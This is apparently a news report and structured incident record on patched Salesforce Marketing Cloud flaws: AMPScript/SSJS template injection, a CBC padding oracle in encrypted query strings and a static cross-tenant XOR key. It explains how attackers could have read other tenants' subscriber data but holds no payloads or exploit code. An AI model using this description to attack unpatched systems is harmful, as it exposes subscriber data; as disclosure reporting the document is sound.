Salesforce Marketing Cloud Patches Critical Vulnerabilities Exposing Subscriber Data
Salesforce recently addressed a series of high-severity vulnerabilities in its Marketing Cloud (SFMC) platform that could have allowed attackers to access and exfiltrate marketing emails, subscriber records, and engagement data across multiple tenants including Fortune 500 organizations.
The flaws stemmed from weaknesses in SFMC’s server-side templating and encryption mechanisms. AMPScript and SSJS, used for dynamic email personalization, included functions like TreatAsContent that enabled template injection. Attackers could exploit this by embedding malicious payloads in user-controlled fields (e.g., name fields), which would execute during template evaluation. Once injected, built-in functions like LookupRows allowed queries against internal data views, exposing subscriber lists, sent emails, and tracking data.
A more severe issue involved SFMC’s "view email in browser" and CloudPages features, which relied on encrypted query strings (qs parameters) to authenticate users. Researchers at Searchlight Cyber discovered that the older "classic" qs format used unauthenticated CBC encryption with a padding oracle vulnerability, enabling decryption and re-encryption of parameters. Additionally, a legacy XOR-based encryption scheme with a static key allowed rapid decryption of sensitive identifiers like JobID and ListSubscriber. Since SFMC reused a single static encryption key across tenants, attackers could forge qs tokens to access emails and subscriber data from other organizations.
The vulnerabilities, reported on 16 January 2026, were mitigated between 21–24 January 2026. Salesforce migrated to AES-GCM encryption, rotated keys, disabled double evaluation of email subject templates, and invalidated all legacy tracking and CloudPages links created before 21 January 2026 (23:00 UTC). No confirmed malicious exploitation was reported.
The incident underscores risks in shared SaaS infrastructure, where template engines and cryptographic flaws can expose high-value marketing data at scale. Salesforce assigned multiple CVEs to address broken encryption, hard-coded keys, and argument injection in MicrositeURL and CloudPages workflows.
Source: https://gbhackers.com/salesforce-marketing-cloud-vulnerability/
Agentforce Marketing cybersecurity rating report: https://www.rankiteo.com/company/salesforce-marketing-cloud-
Fortune cybersecurity rating report: https://www.rankiteo.com/company/fortune
"id": "SALFOR1778063116",
"linkid": "salesforce-marketing-cloud-, fortune",
"type": "Vulnerability",
"date": "1/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'customers_affected': 'Multiple tenants',
'industry': ['Marketing', 'Technology'],
'name': 'Salesforce Marketing Cloud (SFMC) Tenants',
'size': 'Enterprise (Fortune 500 organizations '
'included)',
'type': 'SaaS Platform'}],
'attack_vector': ['Template Injection', 'Cryptographic Weakness Exploitation'],
'data_breach': {'data_encryption': ['Broken (CBC encryption with padding '
'oracle)',
'Legacy XOR-based encryption with static '
'key'],
'data_exfiltration': 'Possible',
'personally_identifiable_information': 'Subscriber records',
'sensitivity_of_data': 'High (subscriber data, tracking data)',
'type_of_data_compromised': ['Marketing emails',
'Subscriber records',
'Engagement data']},
'date_detected': '2026-01-16',
'date_resolved': '2026-01-24',
'description': 'Salesforce recently addressed a series of high-severity '
'vulnerabilities in its Marketing Cloud (SFMC) platform that '
'could have allowed attackers to access and exfiltrate '
'marketing emails, subscriber records, and engagement data '
'across multiple tenants including Fortune 500 organizations. '
'The flaws stemmed from weaknesses in SFMC’s server-side '
'templating and encryption mechanisms.',
'impact': {'data_compromised': ['Marketing emails',
'Subscriber records',
'Engagement data'],
'systems_affected': ['Salesforce Marketing Cloud (SFMC)']},
'investigation_status': 'Resolved',
'lessons_learned': 'The incident underscores risks in shared SaaS '
'infrastructure, where template engines and cryptographic '
'flaws can expose high-value marketing data at scale.',
'post_incident_analysis': {'corrective_actions': ['Migrated to AES-GCM '
'encryption',
'Rotated encryption keys',
'Disabled double evaluation '
'of email subject templates',
'Invalidated legacy '
'tracking and CloudPages '
'links',
'Assigned CVEs to address '
'vulnerabilities'],
'root_causes': ['Weaknesses in server-side '
'templating (AMPScript/SSJS)',
'Broken encryption (CBC padding '
'oracle, static XOR key)',
'Hard-coded encryption keys',
'Argument injection '
'vulnerabilities']},
'references': [{'source': 'Searchlight Cyber'}],
'response': {'containment_measures': ['Migrated to AES-GCM encryption',
'Rotated encryption keys',
'Disabled double evaluation of email '
'subject templates',
'Invalidated all legacy tracking and '
'CloudPages links created before 21 '
'January 2026 (23:00 UTC)'],
'remediation_measures': ['Patched vulnerabilities',
'Assigned multiple CVEs']},
'title': 'Salesforce Marketing Cloud Patches Critical Vulnerabilities '
'Exposing Subscriber Data',
'type': ['Data Breach', 'Vulnerability Exploitation'],
'vulnerability_exploited': ['CBC encryption padding oracle',
'Static XOR encryption key',
'AMPScript/SSJS template injection',
'Hard-coded encryption keys',
'Argument injection in MicrositeURL and '
'CloudPages']}